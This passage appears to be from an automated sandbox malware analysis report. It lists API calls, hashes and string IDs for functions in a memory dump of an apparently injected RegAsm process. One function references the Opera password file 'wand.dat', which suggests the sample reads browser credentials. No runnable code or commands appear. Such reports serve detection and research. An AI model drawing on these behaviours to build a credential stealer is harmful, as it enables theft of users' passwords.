                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                            • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                            • String ID:
                            • API String ID: 2903831945-0
                            • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                            • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                            APIs
                            • GetParent.USER32(?), ref: 0040D453
                            • GetWindowRect.USER32(?,?), ref: 0040D460
                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Window$Rect$ClientParentPoints
                            • String ID:
                            • API String ID: 4247780290-0
                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                            • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                            • memset.MSVCRT ref: 004450CD
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                            • CloseHandle.KERNEL32(00000000), ref: 004450F7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                            • String ID:
                            • API String ID: 1471605966-0
                            • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                            • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                            APIs
                            • wcscpy.MSVCRT ref: 0044475F
                            • wcscat.MSVCRT ref: 0044476E
                            • wcscat.MSVCRT ref: 0044477F
                            • wcscat.MSVCRT ref: 0044478E
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                            • String ID: \StringFileInfo\
                            • API String ID: 102104167-2245444037
                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@
                            • String ID:
                            • API String ID: 613200358-0
                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$??3@
                            • String ID: g4@
                            • API String ID: 3314356048-2133833424
                            • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                            • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                            APIs
                            • memset.MSVCRT ref: 004100FB
                            • memset.MSVCRT ref: 00410112
                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                            • _snwprintf.MSVCRT ref: 00410141
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf_wcslwrwcscpy
                            • String ID: </%s>
                            • API String ID: 3400436232-259020660
                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                            APIs
                            • memset.MSVCRT ref: 0040D58D
                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ChildEnumTextWindowWindowsmemset
                            • String ID: caption
                            • API String ID: 1523050162-4135340389
                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                            APIs
                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                            • String ID: MS Sans Serif
                            • API String ID: 210187428-168460110
                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memcmp
                            • String ID:
                            • API String ID: 3384217055-0
                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$memcpy
                            • String ID:
                            • API String ID: 368790112-0
                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                            APIs
                            • memset.MSVCRT ref: 0040560C
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                            • String ID: *.*$dat$wand.dat
                            • API String ID: 2618321458-1828844352
                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                            APIs
                            • memset.MSVCRT ref: 00412057
                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                            • GetKeyState.USER32(00000010), ref: 0041210D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                            • String ID:
                            • API String ID: 3550944819-0
                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                            APIs
                            • wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • memcpy.MSVCRT ref: 0040A94F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$memcpy$mallocwcslen
                            • String ID:
                            • API String ID: 3023356884-0
                            • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                            • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                            APIs
                            • wcslen.MSVCRT ref: 0040B1DE
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                            • memcpy.MSVCRT ref: 0040B248
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$memcpy$mallocwcslen
                            • String ID:
                            • API String ID: 3023356884-0
                            • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                            • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: @
                            • API String ID: 3510742995-2766056989
                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                            APIs
                            • strlen.MSVCRT ref: 0040B0D8
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                            • memcpy.MSVCRT ref: 0040B159
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$memcpy$mallocstrlen
                            • String ID:
                            • API String ID: 1171893557-0
                            • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                            • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                            APIs
                            • memset.MSVCRT ref: 004144E7
                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                              • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                            • memset.MSVCRT ref: 0041451A
                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                            • String ID:
                            • API String ID: 1127616056-0
                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                            • malloc.MSVCRT ref: 00417459
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$??3@malloc
                            • String ID:
                            • API String ID: 4284152360-0
                            • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                            • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                            • RegisterClassW.USER32(?), ref: 00412428
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule$ClassCreateRegisterWindow
                            • String ID:
                            • API String ID: 2678498856-0
                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                            • malloc.MSVCRT ref: 00417407
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                            • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$??3@malloc
                            • String ID:
                            • API String ID: 4284152360-0
                            • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                            • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                            APIs
                            • memset.MSVCRT ref: 0040F673
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                            • strlen.MSVCRT ref: 0040F6A2
                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                            • String ID:
                            • API String ID: 2754987064-0
                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                            APIs
                            • memset.MSVCRT ref: 0040F6E2
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                            • strlen.MSVCRT ref: 0040F70D
                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                            • String ID:
                            • API String ID: 2754987064-0
                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscpy$CloseHandle
                            • String ID: General
                            • API String ID: 3722638380-26480598
                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                            APIs
                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                            • GetStockObject.GDI32(00000000), ref: 004143C6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                            • String ID:
                            • API String ID: 764393265-0
                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                            APIs
